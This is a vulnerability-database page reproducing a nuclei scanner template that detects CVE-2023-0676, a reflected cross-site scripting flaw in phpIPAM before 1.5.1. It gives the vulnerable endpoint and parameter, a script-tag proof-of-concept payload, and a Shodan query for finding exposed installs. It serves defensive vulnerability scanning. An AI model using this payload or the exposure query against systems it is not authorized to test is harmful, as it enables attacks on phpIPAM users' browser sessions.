Lucene search
K

phpIPAM 1.5.1 - Cross-site Scripting

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 35 Views

phpIPAM 1.5.1 - Cross-site Scripting vulnerability allows executing malicious scripts. Update to latest version to patch

Related
Refs
Code
ReporterTitlePublishedViews
Family
Huntr
Cross Site Scripting (XSS) Reflected
1 Nov 202206:07
huntr
Circl
CVE-2023-0676
4 Feb 202320:35
circl
CNNVD
phpIPAM 跨站脚本漏洞
4 Feb 202300:00
cnnvd
CNVD
phpIPAM Cross-Site Scripting Vulnerability (CNVD-2023-09716)
7 Feb 202300:00
cnvd
CVE
CVE-2023-0676
4 Feb 202300:00
cve
Cvelist
CVE-2023-0676 Cross-site Scripting (XSS) - Reflected in phpipam/phpipam
4 Feb 202300:00
cvelist
EUVD
EUVD-2023-12705
3 Oct 202520:07
euvd
NVD
CVE-2023-0676
4 Feb 202313:15
nvd
OpenVAS
phpIPAM < 1.5.1 Multiple Vulnerabilities
6 Feb 202300:00
openvas
OSV
CVE-2023-0676 Cross-site Scripting (XSS) - Reflected in phpipam/phpipam
4 Feb 202300:00
osv
Rows per page
id: CVE-2023-0676

info:
  name: phpIPAM 1.5.1 - Cross-site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    Cross-site Scripting (XSS) - Reflected in GitHub repository phpipam/phpipam prior to 1.5.1.
  impact: |
    Allows attackers to execute malicious scripts in the context of a user's browser session.
  remediation: |
    Update phpipam/phpipam to the latest version to patch the vulnerability.
  reference:
    - https://huntr.dev/bounties/b72d4f0c-8a96-4b40-a031-7d469c6ab93b
    - https://nvd.nist.gov/vuln/detail/CVE-2023-0676
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-0676
    cwe-id: CWE-79
    epss-score: 0.01532
    epss-percentile: 0.71715
    cpe: cpe:2.3:a:phpipam:phpipam:*:*:*:*:*:*:*:*
  metadata:
    vendor: phpipam
    product: phpipam
    shodan-query: html:"phpIPAM IP address management"
  tags: cve,cve2023,phpipam,xss,authenticated,vuln

http:
  - raw:
      - |
        POST /app/login/login_check.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        ipamusername={{username}}&ipampassword={{password}}

      - |
        POST /app/tools/ip-calculator/bw-calculator-result.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest
        Referer: {{BaseURL}}/phpipam/index.php?page=tools&section=ip-calculator&subnetId=bw-calculator

        wsize=50000&delay=<script>alert(document.domain)</script>&fsize=1024

    matchers:
      - type: dsl
        dsl:
          - contains(body_1, "Login successful")
          - contains(body_2, "<script>alert(document.domain)</script>")
          - contains(content_type_2, "text/html")
          - status_code_2 == 200
        condition: and
# digest: 4a0a00473045022100d4aab16a7f9cf97ca1dbcf4ef14188495e957af9dac7bd782a5a2b98f604158d0220115570bad7d3ec1f32cc9df5a470f5b2595ad4294df8981f4952267e7c7b8295:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 3.16.1
CVSS 32.4
EPSS0.01532
SSVC
35